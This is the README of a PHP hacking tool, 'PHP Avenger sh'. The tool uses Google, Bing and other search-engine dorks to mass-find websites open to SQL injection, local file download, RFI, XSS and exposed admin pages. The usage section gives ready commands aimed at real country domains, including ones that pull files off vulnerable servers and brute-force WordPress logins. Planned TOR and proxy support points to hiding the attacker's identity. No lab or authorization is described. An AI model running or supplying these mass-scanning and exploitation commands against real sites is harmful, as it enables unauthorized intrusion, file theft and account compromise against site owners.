/README.md

https://github.com/aszone/avenger-sh · Markdown · 135 lines · 101 code · 34 blank · 0 comment · 0 complexity · 5b394ac44eaaa9af58f0336545e9d67a MD5 · raw file

  1. # PHP Avenger
  2. > PHP Avenger is a modern collection of open source tools written in PHP with focus in security and hacking.
  3. ### Beta
  4. * PHP Avenger sh ( Search Engine )
  5. ### Future Implementation
  6. * PHP Avenger bt ( Brute - Force )
  7. * PHP Avenger sca ( State Code Analyse )
  8. * PHP Avenger pwp ( Plugin WordPress )
  9. * PHP Avenger cj ( Component Joomla )
  10. ***
  11. ### PHP Avenger SH
  12. > Php Avenger sh is a open source tool with an idea **based in a fork inurlbr by Cleiton Pinheiro**. Basically **PHP Avenger sh** is a tool that automates the process of detecting possible vulnerabilities using mass scan and checking if the vulnerability is true or false. Php Avenger uses search engines like google, bing and others through dorks ( advanced search ).
  13. ## Installation
  14. The recommended way to install PHP Avenger is through
  15. [Composer](http://getcomposer.org).
  16. ```bash
  17. # Install Composer
  18. curl -sS https://getcomposer.org/installer | php
  19. ```
  20. Next, run the Composer command to install the latest beta version of Php Avenger SH:
  21. ```bash
  22. php composer.phar create-project aszone/avenger-sh
  23. cd avenger-sh
  24. ```
  25. ## Basic Usage
  26. > Use the commands bellow to init the process, results will be printed in the monitor and saved in a `.txt` file on folder `results`.
  27. ### Get trash search
  28. ```bash
  29. php avenger sh --dork="site:com.ar ext:sql password"
  30. ```
  31. #### Result of trash search
  32. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem1.png)
  33. ### Check Sql Injection
  34. ```bash
  35. php avenger sh --dork="site:com.ar inurl:php?id=" --check="sqli"
  36. ```
  37. #### Result of Sql Injection
  38. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem2.png)
  39. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem3.png)
  40. ### Check Local File Download
  41. ```bash
  42. php avenger sh --dork="site:com.ar inurl:download.php?file=" --check="lfd"
  43. ```
  44. #### Result of Local File Download
  45. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem7.png)
  46. ### Check and Exploited Local File Download
  47. > This next command you will check vulnerabilities and extract files of server. The files will save in /results/exploits/lfd/
  48. ```bash
  49. php avenger sh --dork="site:com.mx inurl:download.php?file=" --check="lfd" --exploit="lfd"
  50. ```
  51. #### Result of Extract Files
  52. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/11/lfdFiles.png)
  53. #### Video of Extract Files
  54. [![Video of extract files](https://img.youtube.com/vi/IdrpQ7KQlmU/0.jpg)](https://www.youtube.com/watch?v=IdrpQ7KQlmU)
  55. ### Check is Admin Page
  56. ```bash
  57. php avenger sh --dork="site:com.ar inurl:admin" --check="isAdmin"
  58. ```
  59. ### Check is Admin Page and if Admin Page for WordPress get all users and start brute force
  60. ```bash
  61. php avenger sh --dork="site:com inurl:wp-content/uploads" --check="isAdmin" --exploit="btwp"
  62. ```
  63. ### Help for commands
  64. ```bash
  65. php avenger sh
  66. ```
  67. ## Details
  68. #### Search Engines
  69. * Google
  70. * GoogleApi
  71. * Bing
  72. * DuckDuckGo
  73. * Yahoo
  74. * Yandex
  75. #### Covered Vulnerabilities
  76. * Sql Injection (SQLI)
  77. * Local File Download (LFD)
  78. * Admin Page
  79. * Remote File Inclusion (RFI)
  80. * Cross-Site-Scripting (XSS)
  81. #### Covered Exploits
  82. * Local File Download (LFD)
  83. * Brute Force for WordPress
  84. #### Covered Vulnerabilities in next versions
  85. * Sensitive Files
  86. * Dump Files
  87. * Config Files
  88. * Open Folders
  89. #### Features under development
  90. * Power Search
  91. * Send E-mail with results
  92. * Naming the `.txt` result file
  93. * Proxys
  94. * TOR
  95. * Site of Proxys
  96. * **Virgin Proxies**
  97. ## Help and docs
  98. * [Documentation](http://phpavenger.aszone.com.br).
  99. * [Examples](http://phpavenger.aszone.com.br/examples).
  100. * [Videos](https://www.youtube.com/user/MrLenonleite).
  101. * [Steakoverflow](http://phpavenger.aszone.com.br).